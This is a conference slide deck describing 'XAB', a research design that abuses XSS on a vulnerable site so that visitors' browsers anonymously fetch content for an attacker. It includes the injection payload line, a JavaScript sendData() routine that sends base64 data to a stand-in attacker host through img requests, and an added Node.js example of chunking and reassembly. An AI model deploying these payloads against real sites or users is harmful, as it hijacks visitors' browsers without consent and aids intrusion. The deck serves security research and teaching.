How did we get here?

The beginning: large-scale threats

Firewall. "Thanks, network guys" - some bad guy 

The browser is the new (old) battleground
Cross Site Scripting Speed Lesson

• Lack of input validation / output encoding 

• Stored vs. Reflected 

• Nobody paid attention 

• Has a future - to remain the top web attack in 2019?
Background

The goal: retrieve Web content anonymously 
Comparison to onion routing 

-Volunteering hosts vs. volunteered hosts 
-Tor, the Einstein of anonymity 

Combining unrelated ideas 
-Cross Site Scripting 
-Anonymity 
Background

Simplistic design: 

- Attacker exploits vulnerable site with initial payload

- Victims/Participants receive payload (HTML injection attack)
and identify new target URL to request

- Participants retrieve target content and send it back to
the attacker

Some very serious problems with this design 
Technical Difficulties

Browsers and cross domain access

- Browser security control (the same-origin policy): script running in
domain A cannot read content from domain B (with minor, unhelpful
exceptions)

- Initial payload exists in domain A... the attacker's desired
content lives in domain B

- Workarounds: things you may already know

• DNS "rebinding" attack

• Proxy

• Random or one-off browser bugs
More Technical Difficulties

Non-text content

- Images, audio, video, etc. are not treated the same as HTML
text and markup

- JavaScript can edit image attributes

- JavaScript limitation: cannot read image content/bytes
(true of the browsers of the day; the canvas API now exposes
pixels, but only for same-origin or CORS-permitted images, so it
does not help across domains)

- Workarounds:

• Random or one-off browser bugs

• Some very cool server-side functionality, running at the proxy
(e.g. encoding the fetched bytes as text, as CDProxy does in step 6.1)
Even More Technical Difficulties

HTTP verbs other than 'GET'

- Easy to implement with a proxy

- Use a POST forwarder (reformat GET as POST)

Finding the attacker's server from a victim

- Dynamic DNS

- Long-term dynamic IP from ISP

- Q: Doesn't this unmask the attacker's host?
  A: Free web hosting (w/ perl) sites
Whiskey Tango Foxtrot?

Stateless components 

- Multiple, stateless HTTP requests 

- Out of order requests 

Browser multithreading 

Inconsistent browser implementations 

- Maximum URL request size 

- Unknown problems with Safari 
Design

Components 

- XABAttacker: proxy web server hosting the main Perl code
(xabattacker.pl) and the Target queue

- HTTProxAB: attacker's interface to XABAttacker for queue
updating and response data viewing

- VulnerableSite: web server that is vulnerable to HTML
injection and serves the initial payload to victims/participants

- Participant: any user that receives the initial payload stored
at VulnerableSite

- CDProxy: proxy web server scripts (cdproxy.pl) used to
fetch target content and return data to Participant

- Target: any resource the attacker wishes to retrieve
anonymously
Design

Instructions to implement XAB 

1. Attacker uploads initial XAB payload 

2. Participant visits Vulnerable Site and parses 
HTML, which requests additional script from 
XABAttacker 

3. XABAttacker sends second payload to 
Participant; this payload includes: 

a) CDProxy location 

b) Target URL(s) to be retrieved 

4. Participant makes another script request to 
CDProxy with Target 






Design

Instructions to implement XAB (continued)

5. CDProxy requests content from Target

6. Target returns content

7. CDProxy encodes content as a string and sends a
script that includes:

a) Code to send data back to XABAttacker

b) Data string (encoded version of Target contents)

8. Participant forwards data to XABAttacker

9. Attacker browses content
Design

• Two modes of operation (Step Zero)

- Standard, batch retrieval of data
  • Offline mode
  • Slower/smaller XAB networks
  • Reflected XSS

- Slick, seamless attacker browser HTTP proxy
  • Online mode
  • Faster/larger XAB networks
  • Persistent XSS
XAB Implementation Example

[Diagram of the example network: Attacker, XAB Attacker, Vulnerable Site, Victims, CD Proxy, Target Site]
HTTProxAB Process Flow - Initial

0.0 Listens on pre-defined IP and port 

0.1 Accepts incoming HTTP request from 
attacker 

0.2 Inserts request into queue file: 

request ID #, HTTP method, URI 



Human Process Flow

1.0 Attacker uploads initial payload to VulnSite

2.0 Participant browses VulnSite, receives
Attacker's payload
XABAttacker Flow - New Payload

3.0 Receives payload request from Participant 

3.1 Access internal queue file, retrieve 
request ID, method, URI 

3.2 Removes request from queue 

3.3 Responds to client with JavaScript setting
request ID, target URI and CDProxy URL

3.4 Defines the JavaScript function (sendData()) that
splits the response data into segments

3.5 Gives Participant a new JavaScript include
with URI set to the item extracted from the queue
Cross Domain Proxy Flow

4.0 Receives target URL from Participant 
browser 

5.0 Makes request to Target 

6.0 Receives response from Target 

6.1 Base64 encodes the retrieved content

7.0 Makes call to pre-sent sendData() with 
base64 encoded data 
XABAttacker Flow - Accept Data

8.0 Receives incoming img requests from Participant
8.0.1 Request #, Seq #, Max #, Base64 data

8.1 Writes data to file with format: request#-
sequence#-max#

8.2 Responds to Participant with a 1x1 GIF

8.3 Combines chunks, base64 decodes and
places file in dump directory
HTTProxAB Flow - Presentation

9.0 Scans datadump dir for request ID file 
until timeout 

9.1 If a file for the request ID exists, determine its
type and send it to the browser.

9.2 Attacker views web page 
Victim/JavaScript Code

• Initial payload delivered by vulnerable
Site (Step 2); it pulls the second payload from XABAttacker

<script src=http://www.attacker.xab/cgi-bin/
Code Summary

• Delivery to XABAttacker (step 8)

// baseurl (the XABAttacker URL, carrying ?i=<request ID>) and sessionid
// are globals set by the second payload (step 3.3).
function sendData(data) {
    // keep each request URL under ~2000 chars (browser URL size limits)
    var maxdatalen = 2000 - baseurl.length;
    var totalsegs = Math.ceil(data.length / maxdatalen);
    var totalsegsstr = totalsegs + '';

    var head = document.getElementsByTagName('head').item(0);
    var newImage = new Array();
    var secstr;
    for (var i = 0; i < totalsegs; i++) {
        newImage[i] = document.createElement('img');
        secstr = i + '';
        // one segment per <img>: t = total segments, n = this segment, d = data
        // (the segment is not percent-encoded, so a base64 '+' reaches the
        // CGI as a space unless the server side compensates)
        newImage[i].src = baseurl + '&t=' + totalsegsstr
            + '&n=' + secstr + '&d='
            + data.substring(i * maxdatalen,
                             Math.min((i + 1) * maxdatalen, data.length));
        newImage[i].type = 'text/javascript';
        newImage[i].name = 'sendscript' + sessionid + secstr;
        newImage[i].id = 'sendscript' + sessionid + secstr;
        head.appendChild(newImage[i]);
    }
}
sendData() img src Request Parameters

i: Target URI request identifier (carried in baseurl)

t: Total number of data segments (# requests)

n: Data segment sequence number

d: Data segment (actual base64 encoded data)

- data.substring(i*maxdatalen,
Math.min((i+1)*maxdatalen, data.length));
sendData() img src Request Example

<img src="http://www.attacker.xab/cgi-bin/xabattacker.pl?i=12&n=1&t=3&d=ZGVjb2RlIG">

<img src="http://www.attacker.xab/cgi-bin/xabattacker.pl?i=12&n=3&t=3&d=mVlIGJlZXI=">

<img src="http://www.attacker.xab/cgi-bin/xabattacker.pl?i=12&n=2&t=3&d=1lIGZvciBmc">

(segments shown arriving out of order, as they do in practice)
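The chunking that sendData() performs and the reassembly XABAttacker does in steps 8.1-8.3, as an added example that is not part of this deck or of FYRM's XAB code. It is written as plain Node.js rather than the browser/Perl split of the real tool so that it runs offline: chunkForImgRequests() mirrors the deck's arithmetic on the participant side, parseImgRequest() and reassemble() are the receiving side. Assumptions: query parameters i/t/n/d as on the Request Parameters slide, with baseurl carrying ?i=<request ID>; the three segments on the example slide (request 12, arriving 1, 3, 2) are embedded as constructed input and decode to the text "decode me for free beer"; the sender percent-encodes each segment, which the deck's sendData() does not do.

```javascript
// Added example, not code from the XAB deck: participant-side chunking as in
// sendData() plus the XABAttacker reassembly of steps 8.1-8.3, in Node.js.
// Assumed: parameters i/t/n/d as on the "Request Parameters" slide, and
// baseurl already carrying "?i=<request id>" as in the deck's example.

const MAX_URL = 2000; // the deck's budget for a whole <img> request URL

// Participant side: split the base64 text into URL-sized pieces, one <img>
// request per piece. Same arithmetic as the deck's sendData(); maxUrl is a
// parameter only so a caller can force several segments on short input.
function chunkForImgRequests(baseurl, data, maxUrl = MAX_URL) {
  const maxdatalen = maxUrl - baseurl.length; // deck ignores the ~15 bytes of &t=&n=&d=
  const total = Math.ceil(data.length / maxdatalen);
  const urls = [];
  for (let n = 0; n < total; n++) {
    const seg = data.substring(n * maxdatalen, Math.min((n + 1) * maxdatalen, data.length));
    // Base64 '+' would arrive as a space and '=' is ambiguous in a query
    // string; percent-encode the segment (the deck's code does not).
    urls.push(`${baseurl}&t=${total}&n=${n}&d=${encodeURIComponent(seg)}`);
  }
  return urls;
}

// XABAttacker side, step 8.0.1: pull request id, segment count, segment
// number and data out of one incoming img request; reject anything malformed.
function parseImgRequest(url) {
  const q = new URL(url).searchParams;
  const i = q.get('i'), t = q.get('t'), n = q.get('n'), d = q.get('d');
  if ([i, t, n, d].some((v) => v === null) ||
      !/^\d+$/.test(t) || !/^\d+$/.test(n) || Number(t) < 1) {
    throw new Error('malformed segment request: ' + url);
  }
  return { i, t: Number(t), n: Number(n), d };
}

// Steps 8.1-8.3 for one request id. Segments arrive out of order (browser
// threading) and some may never arrive (the "incomplete transfers" weakness),
// so key on (request id, segment number) and decode only once all t are here.
// Ordering is by segment number, so 0-based and 1-based senders both work.
function reassemble(requests, requestId) {
  const segs = new Map();
  let total = null;
  for (const url of requests) {
    const r = parseImgRequest(url);
    if (r.i !== requestId) continue;
    if (total === null) total = r.t;
    else if (r.t !== total) throw new Error('inconsistent segment count for request ' + requestId);
    segs.set(r.n, r.d); // a retransmitted segment simply overwrites itself
  }
  if (total !== null && segs.size > total) {
    throw new Error('more segments than announced for request ' + requestId);
  }
  if (total === null || segs.size < total) {
    return { complete: false, received: segs.size, total, content: null };
  }
  const b64 = [...segs.keys()].sort((a, b) => a - b).map((n) => segs.get(n)).join('');
  return { complete: true, received: total, total,
           content: Buffer.from(b64, 'base64').toString('utf8') };
}

// Constructed input: the deck's own example slide, three segments of request
// 12 arriving in the order 1, 3, 2 (segment numbering as on that slide).
const DECK_EXAMPLE = [
  'http://www.attacker.xab/cgi-bin/xabattacker.pl?i=12&n=1&t=3&d=ZGVjb2RlIG',
  'http://www.attacker.xab/cgi-bin/xabattacker.pl?i=12&n=3&t=3&d=mVlIGJlZXI=',
  'http://www.attacker.xab/cgi-bin/xabattacker.pl?i=12&n=2&t=3&d=1lIGZvciBmc',
];

if (typeof require !== 'undefined' && require.main === module) {
  console.log(reassemble(DECK_EXAMPLE, '12'));
}
```

The receiving side is where the deck's "stateless components" and "incomplete transfers" points bite: XABAttacker only ever sees independent GET requests, so it has to rebuild state from (request ID, segment number), accept any arrival order, and treat a missing segment as an unfinished transfer rather than as corrupt data.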
Demo Environment Architecture

[Diagram: Host OS running the sites below as virtual machines, behind a Firewall]

- Victim Client
- Attacker Client
- www.vulnsite.xab: website vulnerable to HTML injection attack
- www.target.xab: website with content desired by attacker
- www.attacker.xab
- www.freehost.xab: free CGI hosting server
Weaknesses

Registering XABAttacker and CDProxy for public access

- Common techniques to hide/mask a host

Run XABAttacker and CDProxy on same host

No security in XAB

- Malicious Victims

Cutting through corporate network security
controls, like firewalls

Incomplete transfers

And many others...
On the shoulders of giants...

- AJAX Cross Domain - Bart Van der Donck
- Tor - lots of people
- XSSProxy - Anton Rager
- XSSShell, XSSTunnel - Ferruh Mavituna
Questions

• Q: Why doesn't it have a cool logo? 

- A: I have a day job 

• Q: Why "Cross Site Scripting" instead of "HTML injection"? 

- A: Because "XAB" looks and sounds cooler than "HAB" 

• Q: Why is your company's name FYRM? 

- A: Hangover + faulty spellcheck 

• Q: Where can I get the latest & greatest? 

- A: FYRM website: www.fyrmassociates.com 




Matthew Flick 
matt.flick@fyrmassociates.com 


Jeff Yestrumskas 
jeff@yestrumskas.com 





